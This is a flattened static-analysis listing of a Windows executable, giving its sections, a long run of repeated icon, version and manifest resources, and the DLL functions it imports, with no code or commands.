                          .text0x10000x26ec00x24800False0.516815603596data5.50396706074IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .data0x280000x1e4fe0x1be00False0.057858043722data6.06796420192IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x470000x16f8e80x16fa00False0.218529518021data4.81717219526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x1b70000x6ec0x800False0.75data6.07315256741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x4af700x668dataEnglishUnited States
                          RT_ICON0x4b5d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x4b8c00x1e8dataEnglishUnited States
                          RT_ICON0x4baa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x4bbd00xea8dataEnglishUnited States
                          RT_ICON0x4ca780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x4d3200x6c8dataEnglishUnited States
                          RT_ICON0x4d9e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x4df500x25a8dataEnglishUnited States
                          RT_ICON0x504f80x10a8dataEnglishUnited States
                          RT_ICON0x515a00x988dataEnglishUnited States
                          RT_ICON0x51f280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x523900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x647b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x693e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x6d6080x25a8dataEnglishUnited States
                          RT_ICON0x6fbb00x10a8dataEnglishUnited States
                          RT_ICON0x70c580xeb0dataEnglishUnited States
                          RT_ICON0x71b080x988dataEnglishUnited States
                          RT_ICON0x724900x6b8dataEnglishUnited States
                          RT_ICON0x72b480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x72fb00x668dataEnglishUnited States
                          RT_ICON0x736180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x739000x1e8dataEnglishUnited States
                          RT_ICON0x73ae80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x73c100xea8dataEnglishUnited States
                          RT_ICON0x74ab80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x753600x6c8dataEnglishUnited States
                          RT_ICON0x75a280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x75f900x25a8dataEnglishUnited States
                          RT_ICON0x785380x10a8dataEnglishUnited States
                          RT_ICON0x795e00x988dataEnglishUnited States
                          RT_ICON0x79f680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x7a3d00x668dataEnglishUnited States
                          RT_ICON0x7aa380x2e8dataEnglishUnited States
                          RT_ICON0x7ad200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x7ae480xea8dataEnglishUnited States
                          RT_ICON0x7bcf00x8a8dataEnglishUnited States
                          RT_ICON0x7c5980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x7cb000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x810300x25a8dataEnglishUnited States
                          RT_ICON0x835d80x10a8dataEnglishUnited States
                          RT_ICON0x846800x988dataEnglishUnited States
                          RT_ICON0x850080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x854700x668dataEnglishUnited States
                          RT_ICON0x85ad80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x85dc00x1e8dataEnglishUnited States
                          RT_ICON0x85fa80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x860d00xea8dataEnglishUnited States
                          RT_ICON0x86f780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x878200x6c8dataEnglishUnited States
                          RT_ICON0x87ee80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x884500x25a8dataEnglishUnited States
                          RT_ICON0x8a9f80x10a8dataEnglishUnited States
                          RT_ICON0x8baa00x988dataEnglishUnited States
                          RT_ICON0x8c4280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x8c8900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x9ecb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0xa38e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0xa7b080x25a8dataEnglishUnited States
                          RT_ICON0xaa0b00x10a8dataEnglishUnited States
                          RT_ICON0xab1580xeb0dataEnglishUnited States
                          RT_ICON0xac0080x988dataEnglishUnited States
                          RT_ICON0xac9900x6b8dataEnglishUnited States
                          RT_ICON0xad0480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xad4b00x668dataEnglishUnited States
                          RT_ICON0xadb180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0xade000x1e8dataEnglishUnited States
                          RT_ICON0xadfe80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xae1100xea8dataEnglishUnited States
                          RT_ICON0xaefb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0xaf8600x6c8dataEnglishUnited States
                          RT_ICON0xaff280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xb04900x25a8dataEnglishUnited States
                          RT_ICON0xb2a380x10a8dataEnglishUnited States
                          RT_ICON0xb3ae00x988dataEnglishUnited States
                          RT_ICON0xb44680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xb48d00x668dataEnglishUnited States
                          RT_ICON0xb4f380x2e8dataEnglishUnited States
                          RT_ICON0xb52200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xb53480xea8dataEnglishUnited States
                          RT_ICON0xb61f00x8a8dataEnglishUnited States
                          RT_ICON0xb6a980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xb70000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0xbb5300x25a8dataEnglishUnited States
                          RT_ICON0xbdad80x10a8dataEnglishUnited States
                          RT_ICON0xbeb800x988dataEnglishUnited States
                          RT_ICON0xbf5080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xbf9700x668dataEnglishUnited States
                          RT_ICON0xbffd80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0xc02c00x1e8dataEnglishUnited States
                          RT_ICON0xc04a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xc05d00xea8dataEnglishUnited States
                          RT_ICON0xc14780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0xc1d200x6c8dataEnglishUnited States
                          RT_ICON0xc23e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xc29500x25a8dataEnglishUnited States
                          RT_ICON0xc4ef80x10a8dataEnglishUnited States
                          RT_ICON0xc5fa00x988dataEnglishUnited States
                          RT_ICON0xc69280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xc6d900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0xd91b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0xddde00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0xe20080x25a8dataEnglishUnited States
                          RT_ICON0xe45b00x10a8dataEnglishUnited States
                          RT_ICON0xe56580xeb0dataEnglishUnited States
                          RT_ICON0xe65080x988dataEnglishUnited States
                          RT_ICON0xe6e900x6b8dataEnglishUnited States
                          RT_ICON0xe75480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xe79b00x668dataEnglishUnited States
                          RT_ICON0xe80180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0xe83000x1e8dataEnglishUnited States
                          RT_ICON0xe84e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xe86100xea8dataEnglishUnited States
                          RT_ICON0xe94b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0xe9d600x6c8dataEnglishUnited States
                          RT_ICON0xea4280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xea9900x25a8dataEnglishUnited States
                          RT_ICON0xecf380x10a8dataEnglishUnited States
                          RT_ICON0xedfe00x988dataEnglishUnited States
                          RT_ICON0xee9680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xeedd00x668dataEnglishUnited States
                          RT_ICON0xef4380x2e8dataEnglishUnited States
                          RT_ICON0xef7200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xef8480xea8dataEnglishUnited States
                          RT_ICON0xf06f00x8a8dataEnglishUnited States
                          RT_ICON0xf0f980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xf15000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0xf5a300x25a8dataEnglishUnited States
                          RT_ICON0xf7fd80x10a8dataEnglishUnited States
                          RT_ICON0xf90800x988dataEnglishUnited States
                          RT_ICON0xf9a080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xf9e700x668dataEnglishUnited States
                          RT_ICON0xfa4d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0xfa7c00x1e8dataEnglishUnited States
                          RT_ICON0xfa9a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xfaad00xea8dataEnglishUnited States
                          RT_ICON0xfb9780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0xfc2200x6c8dataEnglishUnited States
                          RT_ICON0xfc8e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0xfce500x25a8dataEnglishUnited States
                          RT_ICON0xff3f80x10a8dataEnglishUnited States
                          RT_ICON0x1004a00x988dataEnglishUnited States
                          RT_ICON0x100e280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1012900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x1136b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x1182e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x11c5080x25a8dataEnglishUnited States
                          RT_ICON0x11eab00x10a8dataEnglishUnited States
                          RT_ICON0x11fb580xeb0dataEnglishUnited States
                          RT_ICON0x120a080x988dataEnglishUnited States
                          RT_ICON0x1213900x6b8dataEnglishUnited States
                          RT_ICON0x121a480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x121eb00x668dataEnglishUnited States
                          RT_ICON0x1225180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x1228000x1e8dataEnglishUnited States
                          RT_ICON0x1229e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x122b100xea8dataEnglishUnited States
                          RT_ICON0x1239b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x1242600x6c8dataEnglishUnited States
                          RT_ICON0x1249280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x124e900x25a8dataEnglishUnited States
                          RT_ICON0x1274380x10a8dataEnglishUnited States
                          RT_ICON0x1284e00x988dataEnglishUnited States
                          RT_ICON0x128e680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1292d00x668dataEnglishUnited States
                          RT_ICON0x1299380x2e8dataEnglishUnited States
                          RT_ICON0x129c200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x129d480xea8dataEnglishUnited States
                          RT_ICON0x12abf00x8a8dataEnglishUnited States
                          RT_ICON0x12b4980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x12ba000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x12ff300x25a8dataEnglishUnited States
                          RT_ICON0x1324d80x10a8dataEnglishUnited States
                          RT_ICON0x1335800x988dataEnglishUnited States
                          RT_ICON0x133f080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1343700x668dataEnglishUnited States
                          RT_ICON0x1349d80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x134cc00x1e8dataEnglishUnited States
                          RT_ICON0x134ea80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x134fd00xea8dataEnglishUnited States
                          RT_ICON0x135e780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x1367200x6c8dataEnglishUnited States
                          RT_ICON0x136de80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1373500x25a8dataEnglishUnited States
                          RT_ICON0x1398f80x10a8dataEnglishUnited States
                          RT_ICON0x13a9a00x988dataEnglishUnited States
                          RT_ICON0x13b3280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x13b7900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x14dbb80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x1527e00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x156a080x25a8dataEnglishUnited States
                          RT_ICON0x158fb00x10a8dataEnglishUnited States
                          RT_ICON0x15a0580xeb0dataEnglishUnited States
                          RT_ICON0x15af080x988dataEnglishUnited States
                          RT_ICON0x15b8900x6b8dataEnglishUnited States
                          RT_ICON0x15bf480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15c3b00x668dataEnglishUnited States
                          RT_ICON0x15ca180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x15cd000x1e8dataEnglishUnited States
                          RT_ICON0x15cee80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15d0100xea8dataEnglishUnited States
                          RT_ICON0x15deb80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x15e7600x6c8dataEnglishUnited States
                          RT_ICON0x15ee280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x15f3900x25a8dataEnglishUnited States
                          RT_ICON0x1619380x10a8dataEnglishUnited States
                          RT_ICON0x1629e00x988dataEnglishUnited States
                          RT_ICON0x1633680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1637d00x668dataEnglishUnited States
                          RT_ICON0x163e380x2e8dataEnglishUnited States
                          RT_ICON0x1641200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1642480xea8dataEnglishUnited States
                          RT_ICON0x1650f00x8a8dataEnglishUnited States
                          RT_ICON0x1659980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x165f000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x16a4300x25a8dataEnglishUnited States
                          RT_ICON0x16c9d80x10a8dataEnglishUnited States
                          RT_ICON0x16da800x988dataEnglishUnited States
                          RT_ICON0x16e4080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x16e8700x668dataEnglishUnited States
                          RT_ICON0x16eed80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x16f1c00x1e8dataEnglishUnited States
                          RT_ICON0x16f3a80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x16f4d00xea8dataEnglishUnited States
                          RT_ICON0x1703780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x170c200x6c8dataEnglishUnited States
                          RT_ICON0x1712e80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1718500x25a8dataEnglishUnited States
                          RT_ICON0x173df80x10a8dataEnglishUnited States
                          RT_ICON0x174ea00x988dataEnglishUnited States
                          RT_ICON0x1758280x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x175c900x12428dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963EnglishUnited States
                          RT_ICON0x1880b80x4c28dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832EnglishUnited States
                          RT_ICON0x18cce00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823EnglishUnited States
                          RT_ICON0x190f080x25a8dataEnglishUnited States
                          RT_ICON0x1934b00x10a8dataEnglishUnited States
                          RT_ICON0x1945580xeb0dataEnglishUnited States
                          RT_ICON0x1954080x988dataEnglishUnited States
                          RT_ICON0x195d900x6b8dataEnglishUnited States
                          RT_ICON0x1964480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1968b00x668dataEnglishUnited States
                          RT_ICON0x196f180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577EnglishUnited States
                          RT_ICON0x1972000x1e8dataEnglishUnited States
                          RT_ICON0x1973e80x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1975100xea8dataEnglishUnited States
                          RT_ICON0x1983b80x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x198c600x6c8dataEnglishUnited States
                          RT_ICON0x1993280x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1998900x25a8dataEnglishUnited States
                          RT_ICON0x19be380x10a8dataEnglishUnited States
                          RT_ICON0x19cee00x988dataEnglishUnited States
                          RT_ICON0x19d8680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x19dcd00x668dataEnglishUnited States
                          RT_ICON0x19e3380x2e8dataEnglishUnited States
                          RT_ICON0x19e6200x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x19e7480xea8dataEnglishUnited States
                          RT_ICON0x19f5f00x8a8dataEnglishUnited States
                          RT_ICON0x19fe980x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_ICON0x1a04000x452ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                          RT_ICON0x1a49300x25a8dataEnglishUnited States
                          RT_ICON0x1a6ed80x10a8dataEnglishUnited States
                          RT_ICON0x1a7f800x988dataEnglishUnited States
                          RT_ICON0x1a89080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_GROUP_ICON0x1a8d700xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a8e200x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a8ea40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a8f540xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a8ff40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a90a40x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a91280xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a91d80xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a92780xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a93280x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a93ac0xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a945c0xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a94fc0xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a95ac0x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a96300xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a96e00xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a97800xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a98300x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a98b40xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a99640xa0dataEnglishUnited States
                          RT_GROUP_ICON0x1a9a040xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a9ab40x84dataEnglishUnited States
                          RT_GROUP_ICON0x1a9b380xaedataEnglishUnited States
                          RT_GROUP_ICON0x1a9be80xa0dataEnglishUnited States
                          RT_VERSION0x1a9c880x340dataEnglishUnited States
                          RT_VERSION0x1a9fc80x2f8dataEnglishUnited States
                          RT_VERSION0x1aa2c00x344dataEnglishUnited States
                          RT_VERSION0x1aa6040x318dataEnglishUnited States
                          RT_VERSION0x1aa91c0x340dataEnglishUnited States
                          RT_VERSION0x1aac5c0x2f8dataEnglishUnited States
                          RT_VERSION0x1aaf540x344dataEnglishUnited States
                          RT_VERSION0x1ab2980x318dataEnglishUnited States
                          RT_VERSION0x1ab5b00x340dataEnglishUnited States
                          RT_VERSION0x1ab8f00x2f8dataEnglishUnited States
                          RT_VERSION0x1abbe80x344dataEnglishUnited States
                          RT_VERSION0x1abf2c0x318dataEnglishUnited States
                          RT_VERSION0x1ac2440x340dataEnglishUnited States
                          RT_VERSION0x1ac5840x2f8dataEnglishUnited States
                          RT_VERSION0x1ac87c0x344dataEnglishUnited States
                          RT_VERSION0x1acbc00x318dataEnglishUnited States
                          RT_VERSION0x1aced80x340dataEnglishUnited States
                          RT_VERSION0x1ad2180x2f8dataEnglishUnited States
                          RT_VERSION0x1ad5100x344dataEnglishUnited States
                          RT_VERSION0x1ad8540x318dataEnglishUnited States
                          RT_VERSION0x1adb6c0x340dataEnglishUnited States
                          RT_VERSION0x1adeac0x2f8dataEnglishUnited States
                          RT_VERSION0x1ae1a40x344dataEnglishUnited States
                          RT_VERSION0x1ae4e80x318dataEnglishUnited States
                          RT_MANIFEST0x1ae8000x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1aef800x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1af1c80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1af5940x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1afd7c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b04fc0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b07440x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b0b100x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b12f80x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b1a780x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b1cc00x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b208c0x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b28740x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b2ff40x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b323c0x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b36080x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b3df00x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b45700x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b47b80x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b4b840x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b536c0x77dXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b5aec0x245XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b5d340x3caXML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States
                          RT_MANIFEST0x1b61000x7e5XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                          Imports

                          DLLImport
                          advapi32.dllRegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegCloseKey, RegEnumValueA, RegSetValueExA, RegDeleteValueA, RegEnumKeyA, RegOpenKeyExA
                          comctl32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                          gdi32.dllGetDeviceCaps, SetBkColor, CreateBrushIndirect, CreateFontIndirectA, SetTextColor, SetBkMode, SelectObject, DeleteObject
                          kernel32.dllGetCommandLineA, CreateThread, LoadLibraryExA, GetFullPathNameA, SetFileAttributesA, GlobalUnlock, WaitForSingleObject, GetTempPathA, GlobalAlloc, GetTempFileNameA, VirtualProtect, GetFileAttributesA, GetProcAddress, GetSystemDirectoryA, Sleep, SearchPathA, GlobalLock, GetPrivateProfileStringA, GetDiskFreeSpaceA, GetCurrentDirectoryA, MultiByteToWideChar, MulDiv, FindClose, lstrcpynA, GetVersion, MoveFileA, SetErrorMode, GetCurrentProcess, FindFirstFileA, GetShortPathNameA, ExpandEnvironmentStringsA, SetFilePointer, GetFileSize, lstrcmpiA, FreeLibrary, GetTickCount, RemoveDirectoryA, ReadFile, CreateDirectoryA, ExitProcess, FindNextFileA, SetCurrentDirectoryA, LoadLibraryA, SetFileTime, CreateFileA, lstrlenA, lstrcmpA, GetModuleHandleA, GetModuleFileNameA, DeleteFileA, WriteFile, CloseHandle, CompareFileTime, lstrcatA, GlobalFree, GetWindowsDirectoryA, WritePrivateProfileStringA, CopyFileA, CreateProcessA, GetExitCodeProcess, GetLastError
                          ole32.dllCoTaskMemFree, OleInitialize, CoCreateInstance, OleUninitialize
                          shell32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHGetSpecialFolderLocation, ShellExecuteA, SHFileOperationA
